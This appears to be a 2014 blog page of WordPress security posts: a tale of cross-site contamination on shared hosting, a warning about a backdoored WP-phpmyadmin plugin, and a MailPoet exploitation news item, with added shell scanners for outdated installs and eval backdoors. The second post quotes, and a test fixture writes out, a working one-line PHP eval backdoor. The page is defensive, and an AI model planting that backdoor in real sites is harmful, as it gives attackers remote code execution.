Ofer For You (1)

Showing posts with label wordpress. Show all posts

Thursday, 14 August 2014

A Little Tale About Website Cross-Contamination

Admin "Kunal Vohra"


Mary has a site that she really cares about; it's called mycoolsite.com. She has learned how to monetize her blog through ads, and this allows her to make her living. She uses WordPress and always keeps it updated. She also keeps her plugins updated, uses strong passwords, accesses the admin panel over SSL and takes all the security recommendations very seriously.
She uses a shared server, and her host offers her unlimited domains. Over the years she has taken advantage of this offering, adding a few sites here and there. One such site is mytestsite.com, used to try out new themes and plugins.

It has been at least a year since she touched one of her other sites, mytestsite.com. It hasn't been updated and houses a plugin that has since been removed from the WordPress repository. Little does Mary know that it was removed from the repository for having a very serious security vulnerability.

Part 1: The bad guys came…


Like in any story, the bad guys wasted no time in finding and exploiting this vulnerability.
They had a list of millions of sites (based on Alexa) that they were scanning daily. They found mycoolsite.com (which was ranking very well) and tried to exploit it, without success. They looked for any potential attack vector: the WordPress version, vulnerable plugins, weak passwords (using brute-force and dictionary attacks). They used a slew of tools from their arsenal, and nothing worked. She won that battle.
A few days later, using a number of techniques, they found that she had another site on the same server, mytestsite.com. Unlike on mycoolsite.com, the same techniques worked here: they quickly found the vulnerable plugin and leveraged it to gain access. Oh well, that's cool, it's only her unimportant site, mytestsite.com, who cares, right?

Part 2: How did my site get hacked?


The next day, she wakes up to emails from her users complaining that mycoolsite.com is setting off their local anti-virus alerts or being blocked outright. The first thing she does is go to her site to see what's going on. She is greeted with a scary warning: "This site may harm your computer"!
"EEK!! What is going on? How did my site get hacked? I did everything right!! I followed all the recommendations!!!"

Part 3: Website Cross Contamination


In Part 1, we left you with a question: "Oh well, that's cool, it's only her unimportant site, mytestsite.com, who cares, right?"
WRONG!!
Yes, Mary did everything right to protect mycoolsite.com. What she didn't do is apply those same principles to all her sites. She forgot that because the other sites are on the same shared account (and are managed by the same user), any vulnerability in them can be used to compromise her whole account.
Once on the server, the attacker was able to introduce all kinds of malicious code, from backdoors to actionable code. Like any virus, it replicated itself, inserting itself into every PHP file it could find. It spread across every directory on her site without remorse.
That, folks, is all she wrote…

Part 4: Fixing the Problem


As you would expect, Mary contacted a company to fix her site, mycoolsite.com. The company went through and removed all the malicious code, including the backdoors. Phew! The site was rendering correctly again, and all warnings were gone.
She even took a few more steps this time around: she restricted wp-admin access by IP address and installed every security plugin she could find. Victory?

Part 5: Website Cross Contamination and Reinfections


Nope. Not even close. Within an hour everything Mary thought she had cleared had reappeared.

Why did this happen when she had done everything by the book, and even hired a company to get it fixed?

The answer is simple: it's a concept known as cross contamination, and it is very easy to understand. We all know how viruses work: they spread. There is no point in a virus that doesn't spread; where is the fun in that?
The same applies to web malware. It duplicates itself, injecting itself into little dark directories you never check, or care to check, places you would not even think of. You might have a directory for all your JavaScript files, and in there you might find a PHP shell. You might have a directory for images, and one of those PNG files might really be an executable in disguise.
Mary did what most people do: she fixed the infection but not the root problem. She spent a week cleaning her little site day in and day out, looking for some relief and demanding that someone fix the problem for good!
She finally took the additional step that had been recommended: scrubbing her whole server. She was dismayed at what was found. She was elated, yet heartbroken at the amount of energy she had put into the effort. After a week of work, lost sleep, a significant hit to her Alexa ranking and many other effects, some monetary, some not, Mary finally had control of her server again.

Pulling it Together

This very real tale is meant to illustrate, by example, the concept of website cross contamination and how serious an issue it is.
The point is very simple: if you have many sites on the same account (running under the same user), any one of them can be used to compromise the others. The attackers don't care how important a site is to you; all they want is an access point.
It's unfortunate, but we see this all the time. It's why one of the first things we do is scan the server, if allowed, for software versions and known vulnerabilities. It's sad to report that too often we find things like this:
/mycoolsite.com (WordPress 3.3.1)
/mycoolsite.com_backup_1 (WordPress 3.1) – Out of Date
/mycoolsite.com_backup_2 (WordPress 3.2.1) – Out of Date
/mycoolsite.com_backup_3 (WordPress 3.2.1) – Out of Date
/myplaysite.com (WordPress 1.5) – Not even kidding about the version. – Out of Date
/myunimportantsite.com (Joomla 1.4) – Out of Date
Action item: check your server today. When you do, ask yourself:
  • Did you ever install test sites, plugins or themes that you no longer use?
  • Do you have old domains running on the same server/account that you don't care about anymore? Delete them all (clean out your garage) to avoid this issue.
  • Feel free to use the free scanner to see if your sites are up to date: http://sitecheck.sucuri.net.
  • Read this article as well: Debug Software From Your Site
Keep only the minimum files, themes and plugins that your site needs to function. Everything else should be disabled or moved to a separate server. While you can never say your risk is zero, that does not mean you can't work to reduce it.
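As an added example (not code from the original post), the shell functions below reproduce the kind of inventory described above: they walk a shared-hosting account, list every WordPress install with the version read from its wp-includes/version.php, and mark every install that is not on the version you pass in as current. The sample account layout is constructed inline, and 3.3.1 is taken as "current" only because it is the newest version in the listing above.

```shell
# wp_inventory DIR: print "site<TAB>version" for every WordPress install below DIR.
# The version is parsed from the line "$wp_version = 'X.Y.Z';" in wp-includes/version.php.
wp_inventory() {
  root="$1"
  find "$root" -type f -path '*/wp-includes/version.php' 2>/dev/null | LC_ALL=C sort |
  while read -r f; do
    site="${f%/wp-includes/version.php}"
    ver=$(sed -n "s/^[\$]wp_version *= *'\([^']*\)'.*/\1/p" "$f")
    printf '%s\t%s\n' "${site#"$root"/}" "${ver:-unknown}"
  done
}

# flag_outdated DIR CURRENT: same listing, marking every install that is not on CURRENT.
flag_outdated() {
  wp_inventory "$1" | while read -r site ver; do
    if [ "$ver" = "$2" ]; then
      printf '%s (WordPress %s)\n' "$site" "$ver"
    else
      printf '%s (WordPress %s) - Out of Date\n' "$site" "$ver"
    fi
  done
}

# count_outdated DIR CURRENT: how many installs need attention (0 when all are current).
count_outdated() {
  flag_outdated "$1" "$2" | grep -c 'Out of Date' || true
}

# make_sample_account: constructed stand-in for a shared account (not a real server).
# Creates three installs like the ones in the listing above and prints the directory.
make_sample_account() {
  d=$(mktemp -d)
  for s in mycoolsite.com:3.3.1 mycoolsite.com_backup_1:3.1 myplaysite.com:1.5; do
    mkdir -p "$d/${s%%:*}/wp-includes"
    printf "<?php\n\$wp_version = '%s';\n" "${s#*:}" > "$d/${s%%:*}/wp-includes/version.php"
  done
  printf '%s\n' "$d"
}
```

On a real account, run flag_outdated against the home directory (for example `flag_outdated /home/mary 3.3.1`) and treat every "Out of Date" line as a site to update or delete.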

Still Having Problem..!!! Connect with Admin 
 Kunal Vohra
Download Our Official Android App & Get Free Internet
"The Hackers Street"

For Daily Updates 

Sunday, 10 August 2014

WP-phpmyadmin WordPress plugin – Delete it now

Admin "Kunal Vohra"

If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it, and we are investigating what is going on.
On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:
<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>
This is not part of the plugin and should be removed immediately!
The snippet above is a backdoor: it executes whatever PHP code is supplied in the asc request parameter, which gives anyone who can reach the file remote access to the affected site.
We also noticed that it was removed from the WordPress plugin repository (originally at wordpress.org/extend/plugins/wp-phpmyadmin/) and is no longer maintained (last update in 2007). Since it is no longer being updated, you shouldn't be using it anymore.
EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:
The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.
So the plugin wasn't removed because of any security issue; but because of the recent odd activity, and because it is not maintained, we recommend deleting it as soon as possible.
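As an added example (not code from the original post), these shell functions look for the same kind of backdoor across a whole account: any PHP file that hands request input straight to eval(), as the upgrade.php line above does. The sample plugin tree is constructed inline and is not the real plugin; the benign and non-PHP files are there to show what the scan must not flag.

```shell
# find_eval_backdoors DIR: print file:line:text for every PHP line under DIR that
# passes $_REQUEST/$_GET/$_POST/$_COOKIE input, optionally via stripslashes(), to eval().
find_eval_backdoors() {
  grep -rnE --include='*.php' \
    'eval *\( *(stripslashes *\( *)?\$_(REQUEST|GET|POST|COOKIE) *\[' "$1" 2>/dev/null |
    LC_ALL=C sort
}

# count_eval_backdoors DIR: number of hits, 0 for a clean tree.
count_eval_backdoors() {
  find_eval_backdoors "$1" | grep -c . || true
}

# make_sample_plugin: constructed stand-in for the plugin directory (not the real plugin).
# Prints the temporary directory it created.
make_sample_plugin() {
  d=$(mktemp -d)
  mkdir -p "$d/wp-phpmyadmin/phpmyadmin"
  # The injected line quoted in the post.
  printf '%s\n' '<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>' \
    > "$d/wp-phpmyadmin/phpmyadmin/upgrade.php"
  # A benign file that reads a request parameter without executing it.
  printf '%s\n' '<?php $page = isset($_GET["p"]) ? (int) $_GET["p"] : 1; ?>' \
    > "$d/wp-phpmyadmin/index.php"
  # A non-PHP file containing similar text, which the scan must ignore.
  printf '%s\n' 'eval($_REQUEST["x"]);' > "$d/wp-phpmyadmin/readme.txt"
  printf '%s\n' "$d"
}
```

Any hit from find_eval_backdoors on a real account is a file to pull and inspect, not just in the plugin directory but in every site under the same user.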

If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.


Friday, 1 August 2014

50,000 Websites Hacked Through MailPoet WordPress Plugin Vulnerability


Users of WordPress, the free and open source blogging tool and content management system (CMS), who have a popular unpatched WordPress plugin installed are being cautioned to upgrade their sites immediately.

A serious vulnerability in the MailPoet WordPress plugin allows an attacker to upload any file they want to the server, including malware, defacements and spam, without any authentication.

MailPoet, formerly known as Wysija Newsletter, is a WordPress plugin with more than 1.7 million downloads that allows developers running WordPress to send newsletters and manage subscribers within the content management system.

In a blog post, security researcher and Sucuri CEO Daniel Cid described the vulnerability as serious and said that in the three weeks since it was disclosed, over 50,000 websites had been remotely exploited by cybercriminals installing backdoors through the vulnerable MailPoet plugin.

Some of those compromised websites don't even run WordPress or don't have the MailPoet plugin enabled, as the malware can infect any website that resides on the same server as a hacked WordPress website, according to the researcher.
"The malware code had some bugs: it was breaking many websites, overwriting good files and appending various statements in loops at the end of files," Cid said in a blog post. "All the hacked sites were either using MailPoet or had it installed on another site within the same shared account -- cross-contamination still matters.
"To be clear, the MailPoet vulnerability is the entry point, it doesn't mean your website has to have it enabled or that you have it on the website; if it resides on the server, in a neighbouring website, it can still affect your website."
The security firm first reported the vulnerability at the beginning of this month. The backdoor installed is very nasty: it creates an admin account that gives attackers full administrative control, and it also injects backdoor code into all themes and core files.

The worst part of this infection is that the malicious code also overwrites valid files, which are very difficult to recover without a good backup in place. It causes many websites to fall over and display the message:
Parse error: syntax error, unexpected ‘)’ in /home/user/public_html/site/wp-config.php on line 91.
The security firm clarifies that every build of MailPoet is vulnerable except the most recent release, 2.6.7, so users are recommended to update as soon as possible.

Sucuri is very active in finding vulnerabilities in the WordPress CMS and encouraging users to install updates. A week ago, it urged users to upgrade their WordPress version due to a vulnerability found in the WPtouch WordPress plugin that could allow any non-administrative logged-in user to upload malicious PHP files or backdoors to the target server without admin privileges.

A few weeks earlier, Sucuri had also found two serious vulnerabilities in the popular WordPress SEO plugin "All in One SEO Pack" and a critical Remote Code Execution (RCE) flaw in the "Disqus Comment System" WordPress plugin.
